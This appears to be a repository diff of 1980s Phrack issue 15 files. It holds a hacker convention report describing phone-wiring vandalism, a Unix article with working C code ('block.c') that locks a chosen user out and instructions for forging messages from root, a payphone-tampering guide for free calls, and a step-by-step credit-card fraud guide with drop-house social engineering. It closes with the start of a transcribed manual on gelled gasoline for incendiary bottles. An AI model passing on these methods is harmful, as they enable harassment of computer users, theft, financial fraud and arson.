Several more hours of partying commenced, as well as hourly pizza deliveries.
Everyone was having a great time, however as the night dragged on, the concern
regarding Dan The Operator and his camera (and other things) grew. He had
been found already talking to John Maxfield once that night on the payphones
and had been caught asking questions about several of the people at the Con.
It wasn't long before the word "TeleTrial" began to be chanted by most of the
Con-goers.
The interested parties gathered in the TeleComputist room and the
interrogation began. Dan The Operator's explanations of events that evening
had been proven false as they contradicted each other. The next step was to
search his belongings. Forest Ranger led the prosecution and started through
Dan's notebooks. In it was information about several of the people at the con
and Taran King's and Forest Ranger's addresses (Dan had been to both their
homes where he could have found the addresses). There were also phone numbers
belonging to people that several Con-goers called. Obviously Dan had been
keeping his eyes and ears open in order to gather information.
Dan became worried when FR wanted to search his suitcase and they stepped
outside for a moment. For some reason Dan was worried about us seeing his
dirty underwear. Now why would he become so frantic about dirty underwear
unless there was something especially dirty about it. You can come to your
own conclusions about this one. Anyway, Dan brought all sorts of electrical
equipment with him, including welding equipment and light switches and things.
The most hilarious item that he brought was Garfield the cat, a stuffed animal
that he slept with.
The camera, tape recorder, film, and tapes were confiscated for later
examining and being that is was around 4 AM, everyone decided to get some
sleep.
______________________________________________________________________________
SummerCon '87; Conference Time Saturday, June 20, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Taran King, Cheap Shades, and I arrived back at Best Western around 12 AM.
Most of the other Con people were either still asleep or out for breakfast.
By 12:45 almost everyone was back and we proceeded to the "Kitty Hawk Room."
Some of the clothing worn at the Con reflected the person's interests.
Bill From RNOC - Computer Hacker (pic)
Lex Luthor - VAX/VMS Rules!
Tuc - UNIX Bozo
The Con started off rather slow as no one really knew how to get it started.
Finally Lex Luthor decided to discuss the current rumors about the BBS
decline. From there the topics included;
Bulletin Boards
Busts (Texas, Virginia, New York)
Fiber Optics
Automatic Number Identification (ANI)
REMOBS
Laws
Handles
Groups
Broadway Hacker
Methods of blowing 2600 Hertz
SCCS
4TELs
800 CLID
Later, Bill From RNOC told some stories about his exploits and proceeded to
draw diagrams of whatever came to mind. Phantom Phreaker and Doom Prophet
were upset that no one wanted to discuss CAMA.
In the meantime, I noticed that Dan The Operator had disappeared. Forest
Ranger and I investigated only to discover that the tapes had disappeared as
well. We caught up with Dan later and discovered that the tapes were now in
Control C's rented station wagon. LOKI let me in and I took the cassette I
had been looking for and a roll of film. The tape had all of my SummerCon
article memos on it and this article is partially the result. We didn't know
about side B, but more on that later.
After the Con, Taran King, Control C, Lucifer 666, Bill From RNOC, and I
headed out to my house where we had some serious copying to do. Control C
brought his computer and we began to copy Metal Shop Private on to his hard
disk drive. While this was going on, Lucifer was receiving a copy of my very
own PWN software to aid him when he takes over with issue XVI. I left the
cassette and film at my house, its a pity I didn't play it right away because
this article would have had a very different end.
Anyway, we finished up and then headed to Chesterfield Mall, a nearby shopping
center. From there we proceeded to the local CO and recovered some
interesting artifacts. Our next stop was to pick up some hardware that we
needed and then more trashing. We returned to Best Western and learned that
Lex Luthor and The Leftist had left due to Leftist's tight schedule.
The rest of the afternoon was mostly uneventful. Lots of rain and not much to
do. As night approached, the party part of the Con began to restart. Several
of us got bored with this and decided to explore parts of the hotel. We found
a Navy wedding reception and decided to take in the food. The management
didn't approve and we were bounced. So then we decided to take a look at the
telephone wiring boxes in the hallways of the buildings. The problem was that
to open them you had to rip out part of the wall. Nevertheless, things have a
way of happening and the residents of several wings of the hotel found
themselves without phone service.
The management didn't like what was happening at all and called the police to
investigate. They spotted several of us running around the hotel and it was a
mad dash back to the rooms for cover. LOKI was spotted going through an open
window into Lucifer 666's room and the police decided to investigate it more
closely. After an hour of panic and excitement, things cooled down and most
of the people in Lucifer 666's room either went to sleep or were playing with
Control C's computer and logging on to Metal Shop Private.
We were bored and so Ninja NYC, Bill From RNOC, Taran King, Tuc, and I decided
to go throw ice on Dan The Operator. We ran down the hall and banged on
L666's door. Suddenly one of the hotel managers appeared and threatened us
that if we didn't go to our rooms and keep quiet he would call the police. We
left the hall and went to the back parking lot. Ninja started a wheel rolling
towards the building and we all knew what the result would be <CRASH!>.
Before it hit we ran at full speed around to the front of the hotel where we
were greeted by a hefty officer of the Bridgeton Police Department. He was
sort of leaning on his car facing us. It was so eerie because it almost
seemed as though he knew we were coming and was waiting for us. We slowed
down considerably until he said, "Run to me boys." No one really reacted
until he said it again, "C'mon run to me boys." Ten seconds later he was
joined by the asshole manager that had yelled at us not more than 60 seconds
ago. "How old are you!?" he asked checking for curfew violations. Our
replies varied from 17 to 21. "Where are you from!?" Bill and Tuc replied
New York, the rest of us kept quiet. "Lets see some room keys!" We showed
him two keys and then he looked at the asshole manager and said, "They belong
here." "Why are you outside, what are you doing!" Taran replied, "Going to
get something to eat, is that okay mister!?"
Our car was parked next to his and we took off for a while. He tried to
follow us, but we quickly left his jurisdiction. While we were out we found
the home of Bigfoot (the truck). We messed around there for a while and then
returned to Best Western and walked around some of the vacant floors of the
hotel.
The only other interesting activity we did that evening was a 3 AM trip to a
24 hour food store. Bill From RNOC, Taran King, Tuc, Sir Francis Drake, and I
went to a Super Schnucks and messed around there. It was huge and we almost
lost SFD. After making a few purchases, we went back to the home of Bigfoot
and Taran decided to play bumper car with some of the super huge tires in the
parking lot. We returned to the hotel for the last time and found Ninja NYC
on the phone with L666's current girlfriend. We harassed her for a while and
then I fell asleep. Taran and a few others made a few other trips around town
and woke me up at about 6 AM Sunday morning.
______________________________________________________________________________
SummerCon '87; Good-bye & Good Luck! Sunday, June 21, 1987
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forest Ranger dropped by early to take Bill From RNOC and Ninja NYC to the
train station, Taran King went along for the ride. It would be over 24 hours
before they got home. Tuc took Dan The Operator to the airport around 7 AM
and at about 8 AM Cheap Shades and I dropped off Sir Francis Drake who was on
his way to Boston. I took Cheap Shades home and then went back to my house to
crash out.
Forest Ranger went back to Best Western to find everyone in Bill's room. Bill
and Ninja never checked out because of an excessively large phone bill that
they didn't want to pay, so everyone took advantage of this situation and
started to to order room service. Sometime later a bellboy appeared to
collect the money due for the room service and everyone left leaving Forest
Ranger behind. "Hey, I'll be right back, I left my wallet in my car, hold on
a sec, okay?" FR never returned and everyone went home except for Tuc who was
at another hotel (He took a room at Ben Franklin because he wasn't welcome at
Best Western after what happened the Sunday previous).
Around 10 AM, I decided that I didn't feel like sleeping and started playing
the tape only to find several unauthorized recordings. Dan had been taping us
all throughout the Con, but the interesting parts came later. There was part
of an Alliance teleconference on the tape where Dan tried to act like he was
some real important person (what a joke!) and a botched up social engineering
job. The BIG shocker hit when I flipped the tape over to discover 45 minutes
of a conversation with John Maxfield aka Cable Pair of BoardScan. I won't go
into details about the conversations right now, but the scary part is that the
tape ends before the phone call does. In other words we don't know exactly
how much information was passed, but we do know that it has been an ongoing
thing, perhaps for months. An actual overview and possible transcript of these
conversations will appear in PWN XV.
I was in shock. I couldn't believe what I was hearing! It especially hurt
when information was passed about people that I actually knew and had met. If
only I had played that tape the night before, this would be a different story
entirely. I didn't know exactly what to do. I had stopped calling out, but I
was willing to pay for a few calls to spread the news. The only problem was
that the majority of the people I wanted to contact were still en route home
or unreachable. I finally was able to reach Tuc who was still in St. Louis.
He dropped by and I played him the tape. Since then, Taran King and Forest
Ranger have also heard most of the tape and preliminary investigations have
begun.
We have discovered some information linking Dan The Operator to the FBI, but
more on that next issue.
______________________________________________________________________________
PWN SummerCon '87 Quicknotes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SummerCon Promotional Posters were created by Lucifer 666. They featured many
trademarks of well known telecommunications companies as well as different
plans and schematics for boxes and other equipment.
------------------------------------------------------------------------------
The Southern Baptists were in town during the week for some National
convention of their own.
------------------------------------------------------------------------------
Johnny Rotten was supposed to appear at SummerCon '87 and called to confirm
his plans on Friday Evening, June 19, 1987. He never appeared.
------------------------------------------------------------------------------
The full guest list of SummerCon '87 includes;
Bill From RNOC / Bit Master / Cheap Shades / Control C / Dan The Operator
Data Line / Doom Prophet / Forest Ranger / Knight Lightning / Lex Luthor
LOKI / Lucifer 666 / Ninja NYC / Phantom Phreaker / Sir Francis Drake
Synthetic Slug / Taran King / The Disk Jockey / The Leftist / Tuc
In closing, SummerCon '87 was a fantastic success and anyone who missed it,
missed out! See you next year at SummerCon '88. Plans are already being
made!
:Knight Lightning
______________________________________________________________________________

46
phrack15/1.txt Normal file
View file

@ -0,0 +1,46 @@
===== Phrack Magazine presents Phrack 15 =====
===== File 1 of 8 : Phrack 15 Intro =====
8/7/87
So, did you miss us? Yes, Phrack is back! Phrack Magazine's beloved
founders, Taran King and Knight Lightning, have gone off to college, and the
recent busts (summarized completely in this month's Phrack World News) have
made it difficult to keep the magazine going.
TK and KL have put the editorship of Phrack in the hands of Elric of
Imrryr and Sir Francis Drake. SFD is primarily responsible for PWN. As of
yet we have no 'Official Phrack BBS.'
Due to various obstacles, the first issue under the new editorship is
rather small. Fortunately, however, the overall quality of the files
presented is among the highest ever. We've managed to keep references to
Oryan QUEST down to as little as possible and we've resisted the temptation to
include some second-rate files as "fillers." Naturally, we're still looking
for excellent, unpublished phreak/hack/pyro/anarchy files to publish in Phrack
XVI and beyond. If you have an article, we'd like to see it! Get in touch
with SFD or Elric when your file is ready for submission.
-- Shooting Shark
Contributing Editor
Note: For now you can contact Phrack Inc. at:
Lunatic Labs: 415-278-7421 300/1200 (Sir Francis Drake or Elric of Imrryr)
Free World: 301-668-7657 300/1200/2400/9600 (Disk Jockey)
Phrack XV Table of Contents
===========================
15-1. Phrack XV Intro by Shooting Shark (2K)
15-2. More Stupid Unix Tricks by Shooting Shark (10K)
15-3. Making Free Local Payfone Calls by Killer Smurf (7K)
15-4. Advanced Carding XIV by The Disk Jockey (12K)
15-5. Gelled Flame Fuels by Elric of Imrryr (12K)
15-6. PWN I: The Scoop on Dan The Operator by KL (19K)
15-7. PWN II: The July Busts by Knight Lightning (21K)
15-8. PWN III: The Affidavit by SFD (6K)

263
phrack15/2.txt Normal file
View file

@ -0,0 +1,263 @@
===== Phrack Magazine presents Phrack 15 =====
===== File 2 of 8 =====
I thought I had written everything there is to write about the Unix operating
system until I was recently asked to put out yet another file... so I said
"I'll try, but don't publish my file along with an article by The Radical
Rocker this time!" These demands having been met, I booted up the PC and
threw together...
--- ---- ---- ------ ------ -- -- ---- -----
% Yet Even More Stupid Things to Do With Unix! $
--- ---- ---- ------ ------ -- -- ---- -----
By Shooting Shark.
Submitted August 26, 1987
These two topics are methods of annoying other users of the system and
generally being a pest. But would you want to see a file on *constructive*
things to do with Unix? Didn't think so...
-- ------- ----- --- --- ------
1. Keeping Users Off The System
-- ------- ----- --- --- ------
Now, we all know by now how to log users off (one way is to redirect an 'stty
0' command to their tty) but unless you have root privs, this will not work
when a user has set 'mesg n' and prevented other users from writing to their
terminal. But even users who have a 'mesg n' command in their .login (or
.profile or .cshrc) file still have a window of vulnerability, the time
between login and the locking of their terminal. I designed the following
program, block.c, to take advantage of this fact.
To get this source running on your favorite Unix system, upload it, call it
'block.c', and type the following at the % or $ prompt:
cc -o block block.c
once you've compiled it successfully, it is invoked like so:
block username [&]
The & is optional and recommended - it runs the program in the background,
thus letting you do other things while it's at work.
If the user specified is logged in at present, it immediately logs them out
(if possible) and waits for them to log in. If they aren't logged in, it
starts waiting for them. If the user is presently logged in but has their
messages off, you'll have to wait until they've logged out to start the thing
going.
Block is essentially an endless loop : it keeps checking for the occurrence of
the username in /etc/utmp. When it finds it, it immediately logs them out and
continues. If for some reason the logout attempt fails, the program aborts.
Normally this won't happen - the program is very quick when run unmodified.
However, to get such performance, it runs in a very tight loop and will eat up
a lot of CPU time. Notice that near the end of the program there is the line:
/*sleep(SLEEP) */
the /* and */ are comment delimiters - right now the line is commented out.
If you remove the comments and re-compile the program, it will then 'go to
sleep' for the number of seconds defined in SLEEP (default is 5) at the end of
every loop. This will save the system load but will slightly decrease the
odds of catching the user during their 'window of vulnerability.'
If you have a chance to run this program at a computer lab at a school or
somewhere similar, run this program on a friend (or an enemy) and watch the
reaction on their face when they repeatedly try to log in and are logged out
before they can do *anything*. It is quite humorous. This program is also
quite nasty and can make you a lot of enemies!
caveat #1: note that if you run the program on yourself, you will be logged
out, the program will continue to run (depending on the shell you're under)
and you'll have locked yourself out of the system - so don't do this!
caveat #2: I wrote this under OSx version 4.0, which is a licensed version of
Unix which implements 4.3bsd and AT&T sysV. No guarantees that it will work
on your system.
caveat #3: If you run this program in background, don't forget to kill it
when you're done with it! (when you invoke it with '&', the shell will give
you a job number, such as '[2] 90125'. If you want to kill it later in the
same login session, type 'kill %2'. If you log in later and want to kill it,
type 'kill 90125'. Just read the man page on the kill command if you need any
help...
----- cut here -----
/* block.c -- prevent a user from logging in
* by Shooting Shark
* usage : block username [&]
* I suggest you run this in background.
*/
#include <stdio.h>
#include <utmp.h>
#include <ctype.h>
#include <termio.h>
#include <fcntl.h>
#define W_OK2
#define SLEEP5
#define UTMP"/etc/utmp"
#define TTY_PRE "/dev/"
main(ac,av)
int ac;
char *av[];
{
int target, fp, open();
struct utmpuser;
struct termio*opts;
char buf[30], buf2[50];
if (ac != 2) {
printf("usage : %s username\n",av[0]);
exit(-1);
}
for (;;) {
if ((fp = open(UTMP,0)) == -1) {
printf("fatal error! cannot open %s.\n",UTMP);
exit(-1);
}
while (read(fp, &user, sizeof user) > 0) {
if (isprint(user.ut_name[0])) {
if (!(strcmp(user.ut_name,av[1]))) {
printf("%s is logging in...",user.ut_name);
sprintf(buf,"%s%s",TTY_PRE,user.ut_line);
printf("%s\n",buf);
if (access(buf,W_OK) == -1) {
printf("failed - program aborting.\n");
exit(-1);
}
else {
if ((target = open(buf,O_WRONLY)) != EOF) {
sprintf(buf2,"stty 0 > %s",buf);
system(buf2);
printf("killed.\n");
sleep(10);
}
} /* else */
} /* if strcmp */
} /* if isprint */
} /* while */
close(fp);
/*sleep(SLEEP); */
} /* for */
}
----- cut here -----
-- ------------- ----- ----- ---- ------ --- ------
2. Impersonating other users with 'write' and 'talk'
-- ------------- ----- ----- ---- ------ --- ------
This next trick wasn't exactly a work of stupefying genius, but is a little
trick (that anybody can do) that I sometimes use to amuse myself and, as with
the above, annoy the hell out of my friends and enemies.
Nearly every Unix system has the 'write' program, for conversing with other
logged-in users. As a quick summary:
If you see that user 'clara' is logged in with the 'who' or 'w' command or
whatever, and you wish to talk to her for some reason or another, you'd type
'write clara'. Clara then would see on her screen something like this (given
that you are username 'shark'):
[3 ^G's] Message from shark on ttyi13 at 23:14 ...
You then type away at her, and whatever you type is sent to her terminal
line-by-line. If she wanted to make it a conversation rather than a
monologue, she'd type 'write shark,' you'd get a message similar to the above
on your terminal, and the two of you would type away at each other to your
little heart's content. If either one of you wanted to end the conversation,
you would type a ^D. They would then see the characters 'EOF' on their
screen, but they'd still be 'write'ing to you until they typed a ^D as well.
Now, if you're on a bigger installation you'll probably have some sort of
full-screen windowing chat program like 'talk'. My version of talk sends the
following message:
Message from Talk_Daemon@tibsys at 23:14 ...
talk: connection requested by shark@tibsys.
talk: respond with: talk shark@tibsys
Anyway, here's where the fun part begins: It's quite easy to put a sample
'write' or 'talk' message into a file and then edit so that the 'from' is a
different person, and the tty is listed differently. If you see that your
dorky friend roger is on ttyi10 and the root also happens to be logged on on
ttyi01, make the file look something like this:
[3 control-G's] Message from root on ttyi01 at [the current time]
wackawackawackawackawacka!!!
[or a similarly confusing or rude message...]
EOF
Then, send this file to roger's terminal with:
cat filename > /dev/ttyi10
He'll get the message on his terminal and wonder what the hell the superuser
is talking about. He might even 'write' back to the superuser with the intent
of asking 'what the hell are you talking about?'. For maximum effectiveness,
*simultaneously* send a message to root 'from' roger at the appropriate
terminal with an equally strange message - they'll then engage in a
conversation that will go something like "what did you mean by that?" "what
do you mean, what do I mean? What did *you* mean by that?" etc. A splendid
time is guaranteed for all! Note that you don't have to make 'root' the
perpetrator of the gag, any two currently logged-in users who have their
terminals open for messages can join in on the fun.
Similarly, you can fake a few 'talk' pages from/to two people...they will then
probably start talking...although the conversation will be along the lines of
"what do you want?" "you tell me." "you paged me, you tell *me." etcetera,
while you laugh yourself silly or something like that.
A variation on the theme: As I said, when using 'write' you type a ^D to end
the conversation, and the person you're typing at sees an 'EOF' on their
screen. But you could also just *type* 'EOF', and they'd think you've
quit...but you still have an open line to their terminal. Even if they later
turn messages off, you still have the ability to write to their terminal.
Keeping this fact in mind, anybody who knows what they're doing can write a
program similar to my 'block' program above that doesn't log a user out when
they appear on the system, but opens their tty as a device and keeps the file
handle in memory so you can redirect to their terminal - to write rude
messages or to log them out or whatever - at any time, until they log out.
As I said, there was no great amount of genius in the above discourse, but
it's a pastime I enjoy occasionally...
-- Shooting Shark
"the first fact to face is that unix was not developed with security, in any
realistic sense, in mind..."
-- Dennis M. Ritchie
"Oryan QUEST couldn't hack his way out of a UNIX system, let alone into one."
-- Tharrys Ridenow

125
phrack15/3.txt Normal file
View file

@ -0,0 +1,125 @@
===== Phrack Magazine presents Phrack 15 =====
===== File 3 of 8 =====
*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*
* *
* How to "Steal" Local Calls from Most Payphones *
* *
* August 25, 1987 *
* *
* By Killer Smurf and Pax Daronicus *
* *
*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*
Most of you have seen WarGames, right? Remember the part where David
was stranded in Colorado and needed to call his girlfriend in Seattle? We
knew you did. If you didn't, what David done was unscrew the mouthpiece
on the payphone and make some connection between the mouthpiece and the
phone. Well... that was pretty close to reality except for two things...
1> Nowadays, mouthpieces are un-unscrewable, and 2> You cannot make long
distance or toll calls using that method. Maybe that DID work on older
phones, but you know Ma Bell. She always has a damn cure for every thing
us Phreaks do. She glued on the mouthpiece!
Now to make free local calls, you need a finishing nail. We highly
recommend "6D E.G. FINISH C/H, 2 INCH" nails. These are about 3/32 of an
inch in diameter and 2 inches long (of course). You also need a large
size paper clip. By large we mean they are about 2 inches long
(FOLDED). Then you unfold the paper clip. Unfold it by taking each
piece and moving it out 90 degrees. When it is done it should look
somewhat like this:
/----------\
: :
: :
: :
: :
\-----
Now, on to the neat stuff. What you do, instead of unscrewing the
glued-on mouthpiece, is insert the nail into the center hole of the
mouthpiece (where you talk) and push it in with pressure or just hammer
it in by hitting the nail on something. Just DON'T KILL THE MOUTHPIECE!
You could damage it if you insert the nail too far or at some weird
angle. If this happens then the other party won't be able to hear what
you say.
You now have a hole in the mouthpiece in which you can easily insert
the paper clip. So, take out the nail and put in the paper clip. Then
take the other end of the paper clip and shove it under the rubber cord
protector at the bottom of the handset (you know, the blue guy...). This
should end up looking remotely like...like this:
/----------\ Mouthpiece
: : /
Paper clip --> : : /
: /---:---\
: : : :------------>
====================\---))): : To earpiece ->
^ ^ \-------------------->
: :
: :
Cord Blue guy
(The paper clip is shoved under the blue guy to make a good connection
between the inside of the mouthpiece and the metal cord.)
Now, dial the number of a local number you wish to call, sayyyy,
MCI. If everything goes okay, it should ring and not answer with the
"The Call You Have Made Requires a 20 Cent Deposit" recording. After the
other end answers the phone, remove the paper clip. It's all that
simple, see?
There are a couple problems, however. One is, as we mentioned
earlier, the mouthpiece not working after you punch it. If this happens
to you, simply move on to the next payphone. The one you are now on is
lost. Another problem is that the touch tones won't work when the paper
clip is in the mouthpiece. There are two ways around this..
A> Dial the first 6 numbers. This should be done without the paper
clip making the connection, i.e., one side should not be connected. Then
connect the paper clip, hold down the last digit, and slowly pull the
paper clip out at the mouthpiece's end.
B> Don't use the paper clip at all. Keep the nail in after you
punch it. Dial the first 6 digits. Before dialing the last digit, touch
the nail head to the plate on the main body of the phone, the money safe
thingy..then press the last number.
The reason that this method is sometimes called clear boxing is
because there is another type of phone which lets you actually make the
call and listen to them say "Hello, hello?" but it cuts off the
mouthpiece so they can't hear you. The Clear Box is used on that to
amplify your voice signals and send it through the earpiece. If you see
how this is even slightly similar to the method we just described up
there, kindly explain it to US!! Cause WE don't GET IT!
Anyways, this DOES work on almost all single slot, Dial Tone First
payphones (Pacific Bell for sure). We do it all the time. This is the
least, WE STRESS *LEAST*, risky form of Phreaking. And remember. There
are other Phreaks like you out there who have read this article and punch
payphones, so look before you punch, and save time.
If you feel the insane desire to have to contact us to bitch at us
for some really stupid mistake in this article, you can reach us at
Lunatic Labs Unltd...415/278-7421. It should be up for quite a while..
Also, if you think of any new ideas that can be used in conjunction
with this method, such as calling a wrong number on purpose and demanding
your quarter back from the 0perator, tell us!! Post it on Looney!! Oh,
and if this only works on Pac Bell phones, tell us also! Thanks for your
time, upload this to every board you can find. You may use this material
in any publication - electronic, written, or otherwise without consent of
the authors as long as it is reproduced in whole, with all credit to the
authors (us!) and Lunatic Labs. And now, the Bullshit:
_________________________________________________________________________
DISCLAIMER: This disclaimer disclaims that this article was written for
your information only. Any injuries resulting from this file
(punctured hands, sex organs, etc.) is NOT OUR FAULT! And of
course if you get really stupidly busted in any way because
of this, it ain't our fault either. You're the dumb ass with
the nail. So, proceed with care, but... HELL! Have fun.
Later...
_________________________________________________________________________

214
phrack15/4.txt Normal file
View file

@ -0,0 +1,214 @@
===== Phrack Magazine presents Phrack 15 =====
===== File 4 of 8 =====
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ The Disk Jockey ~
~ ~
~ presents: ~
~ ~
~ Advanced Carding XIV: ~
~ Clarification of Many Credit Card Misconceptions ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(A 2af Presentation)
Preface:
-------
After reading files that have been put out by various groups and
individuals concerning carding, credit fraud, and the credit system in
general, I am finding more and more that people are basing these files on
ideas, rather than knowing how the system actually works. In this article I
hope to enlighten you on some of the grey areas that I find most people either
do not clarify, or don't know what they are talking about. I can safely say
that this will be the most accurate file available dealing with credit fraud.
I have worked for and against credit companies, and know how they work from
the insiders point of view, and I have yet to meet someone in the modem world
that knows it better.
This file is dedicated to all the phreaks/hacks that were busted for various
reasons in the summer of 1987.
Obtaining Cards:
---------------
Despite popular belief, there IS a formula for Visa and Mastercard
numbers. All credit card account numbers are issued by on issuing company, in
this case, Visa or Mastercard. Although the banks are not aware of any type
of pattern to the account numbers, there IS one that can be found. I plan to
publish programs in the near future that will use the various formulas for
Visa, Mastercard and American Express to create valid accounts.
Accounts:
--------
All that is needed to successfully use a Visa/MC account is the account
number itself. I don't know how many times I have gotten into arguments with
people over this, but this is the way it is. I'll expand on this.
First of all, on all Visa/MC cards, the name means NOTHING. NOTHING AT ALL.
You do not need this name and address of the cardholder to successfully use
the account, at no time during authorization is the name ever needed, and with
over 50,000 banks, credit unions, and various other financial institutions
issuing credit cards, and only 5 major credit verification services, it is
impossible to keep personal data on each cardholder.
Ordering something and having it sent with the real cardholder's name is only
going to make things more difficult, at best. There is no way that you can
tell if the card is a normal card, or a premium (gold) card merely by looking
at the account number. The only thing that can be told by the account number
is the bank that issued the card, but this again, is not needed.
The expiration date means nothing. Don't believe me? Call up an
authorization number and check a card and substitute 12/94, and if the account
number is good, the card will pass. The expiration date is only a binary-type
check to see if the card is good, (Yes/No), it is NOT a checksum-type check
code that has to be matched up to the card account to be valid.
Carding Stupid Things:
---------------------
Whenever anyone, ANYONE tries to card something for the first time, they
ALWAYS want to get something for their computer. This is nice and all, but
just think that every person that has ever tried to card has tried to get a
hard drive and a new modem. Everyone does it, thus every single computer
company out there is aware and watching for that. If I could give every
single person who ever tries to card one piece of advice, it would be to NEVER
order computer equipment. I know there are a hundred guys that will argue
with me about it, but common sense should tell you that the merchants are
going to go out of there way to check these cards.
Merchant Checking:
-----------------
Since I brought up merchants checking the cards, I will review the two
basic ways that almost all mail-order merchants use. Keep these in mind when
designing your name, address and phone number for your drop.
The Directory Assistance Cross-Reference:
----------------------------------------
This method is most popular because it is cheap, yet effective. You can
usually tell these types of checks because during the actual order, you are
asked questions such as "What is your HOME telephone number" and your billing
address. Once they have this information, they can call directory assistance
for your area code, say 312, and ask "May I have the phone number for a Larry
Jerutis at 342 Stonegate Drive?" Of course, the operator should give a number
that matches up with the one that you gave them as your home number. If it
doesn't, the merchant knows that something is up. Even if it is an unlisted
number, the operator will say that there is a Jerutis at that address, but the
telephone number is non-published, which is enough to satisfy the merchant.
If a problem is encountered, the order goes to a special pile that is actually
called and the merchant will talk to the customer directly. Many merchants
have policy to not ship at all if the customer can not provide a home phone
number that corresponds with the address.
The Call Back:
-------------
This deals with the merchant calling you back to verify the order. This
does not imply, however, that you can stand by a payphone and wait for them to
call back. Waiting by a payphone is one of the stupidest things I have ever
heard of, being that few, if any, places other than the pizza place will call
back immediately like that. What most places will do is process your order,
etc, and then call you, sometimes it's the next day, sometimes that night. It
is too difficult to predict when they will call back, but if they don't get a
hold of you, or only get a busy, or an answering machine, they won't send the
merchandise until they speak with you voice. This method is difficult to
defeat, but fortunately, due to the high cost of phone bills, the directory
assistance method is preferred.
Billing Address:
---------------
This should ALWAYS be the address that you are having the stuff sent to.
One of the most stupidest things that you could do to botch up a carding job
would be to say something like "Well, I don't want it sent to my house, I want
it sent to....", or "Well, this is my wife's card, and her name is....".
These methods may work, but for the most part, only rouse suspicion on you.
If the order sounds pretty straightforward, and there isn't any unusual
situations, it will better the chances of the order going through.
Drop Houses:
-----------
These are getting harder and harder to come by for the reasons that
people are more careful then before, and that UPS is smarter, also. Your best
bet is to hit somebody that just moved, and I mean JUST moved, being that UPS
will not know that there is nobody at the house anymore if it is within, say,
a week of their moving. It's getting to the point where in some areas, UPS
won't even leave the stuff on the doorstep, due to liability on their part of
doing that. The old "Leave the stuff in the shrubs while I am at work" note
won't work, most people are smart enough to know that something is odd, and
will more than likely leave the packages with the neighbors before they shove
that hard drive in the bushes. Many places, such as Cincinnati Microwave
(maker of the Escort and Passport radar detectors) require a signature when
the package is dropped off, making it that much harder.
Best Bet:
--------
Here is the method that I use that seems to work well, despite it being a
little harder to match up names and phone numbers. Go to an apartment
building and go to the top floor. The trashier the place, the better. Knock
on the door and ask if "Bill" is there. Of course, or at least hopefully,
there will be no Bill at that address. Look surprised, then say "Well, my
friend Bill gave me this address as being his." The occupants will again say
"Sorry, but there is no Bill here...". Then, say that "I just moved here to
go to school, and I had my parents sent me a bunch of stuff for school here,
thinking that this was Bill's place." They almost always say "Oh Boy...".
Then respond with "Well, if something comes, could you hold on to it for me,
and I will come by in a week and see if anything came?" They will always say
something to the effect of "Sure, I guess we could do that...". Thank them a
million times for helping you out, then leave. A few days after your stuff
comes, drop by and say, "Hi, I'm Jim, did anything come for me?". If
everything was cool, it should have. The best thing to do with this is only
order one or two small things, rather than an AT system with an extra monitor.
People feel more comfortable about signing for something small for someone,
rather than something big, being that most people naturally think that the
bigger it is, the more expensive it is.
This is the best method that I know of, the apartment occupants will
usually sign for the stuff, and be more than happy to help you out.
Advice:
------
The thing that I can never stress enough is to not become greedy. Sure,
the first shipment may come in so easy, so risk-free that you feel as if you
can do it forever. Well, you can't. Eventually, if you do it frequently
enough, you will become the subject of a major investigation by the local
authorities if this becomes a real habit. Despite anything that anyone ever
tells you about the police being "stupid and ignorant", you better reconsider.
The police force is a VERY efficient organization once they have an idea as to
who is committing these crimes. They have the time and the money to catch
you.
Don't do it with friends. Don't even TELL friends that you are doing it. This
is the most stupid, dangerous thing that you could do. First of all, I don't
care how good of friends anyone may be, but if a time came that you hated each
other, this incident could be very bad for you. What could be even worse is a
most common scenario: You and a friend get a bunch of stuff, very
successfully. You tell a few friends at school, either you or him have to
tell only one person and it gets all over. Anyways, there is ALWAYS some type
of informant in every high-school. Be it a teacher, son or daughter of a cop,
or whatever, there is always a leak in every high school. The police decide
to investigate, and find that it is becoming common knowledge that you and/or
your friend have ways of getting stuff for "free" via the computer. Upon
investigation, they call in your friend, and tell him that they have enough
evidence to put out a warrant for his arrest, and that they might be able to
make a deal with him. If he gives a complete confession, and be willing to
testify against your in court, they will let him off with only paying the
restitution (paying for the stuff you got). Of course, just about anyone is
going to think about themselves, which is understandable, and you will get the
raw end of the deal. Don't let anyone ever tell you that as a minor, you
won't get in any trouble, because you can and will. If you are really
uncooperative, they may have you tried as an adult, which would really put you
up the creek, and even as a juvenile, you are eligible to receive probation,
fines, court costs, and just about anything else the judge wants to do with
you. All this boils down to is to not tell anyone anything, and try not to do
it with anyone.
Well, that should about wrap up this file. I hope this clears up some
misconceptions about carding. I am on many boards, and am always open to any
comments/suggestions/threats that anyone might have. I can always be reached
on The Free World II (301-668-7657) or Lunatic Labs (415-278-7421).
Good luck.
-The Disk Jockey

393
phrack15/5.txt Normal file
View file

@ -0,0 +1,393 @@
===== Phrack Magazine presents Phrack 15 =====
===== File 5 of 8 =====
GELLED FLAME FUELS
------------------
A text phile typed by Elric of Imrryr from the book:
Improvised Munitions Handbook (TM 31-210), published
by the Dept of the Army, 1969.
All information is provided only for information purposes
only. Construction and/or use may violate local, state, and/or
federal laws. (Unless your name is Ollie North)
Gelled or paste type fuels are often preferable to raw gasoline for
use in incendiary devices such as fire bottles. This type fuel adheres more
readily to the target and produces greater heat concentration.
Several methods are shown for gelling gasoline using commonly
available materials. The methods are divided into the following categories
based on the major ingredient:
1. Lye Systems
2. Lye-Alcohol Systems
3. Soap-Alcohol Systems
4. Egg White Systems
6. Wax Systems
Lye Systems
Lye (also know as caustic soda or Sodium Hydroxide) can be used in
combination with powdered rosin or castor oil to gel gasoline for use as a
flame fuel which will adhere to target surfaces.
MATERIALS REQUIRED:
------------------
Parts by Volume Ingredient How Used Common Source
--------------- ---------- -------- -------------
